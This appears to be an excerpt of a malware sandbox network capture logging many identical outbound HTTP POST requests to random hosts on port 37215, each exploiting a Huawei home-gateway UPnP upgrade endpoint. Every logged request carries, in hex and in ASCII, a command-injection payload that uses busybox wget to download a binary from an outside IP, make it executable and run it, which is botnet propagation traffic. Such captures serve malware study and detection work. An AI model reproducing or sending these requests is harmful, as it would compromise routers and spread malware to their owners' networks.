2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1534192.168.2.156045241.231.13.3337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.108150959 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1535192.168.2.154073841.41.142.10437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.108153105 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1536192.168.2.154201841.48.83.8837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.108155012 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1537192.168.2.155871641.11.52.11937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.108155966 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1538192.168.2.154753441.163.227.20637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.108161926 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1539192.168.2.155288841.46.191.1437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.108232975 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1540192.168.2.154305041.29.65.15237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.108232975 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1541192.168.2.155598041.196.52.25537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.108232975 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1542192.168.2.153319241.158.2.5137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.108232975 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1543192.168.2.154621641.190.138.10037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.108254910 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1544192.168.2.154619441.23.255.6437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.108273029 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
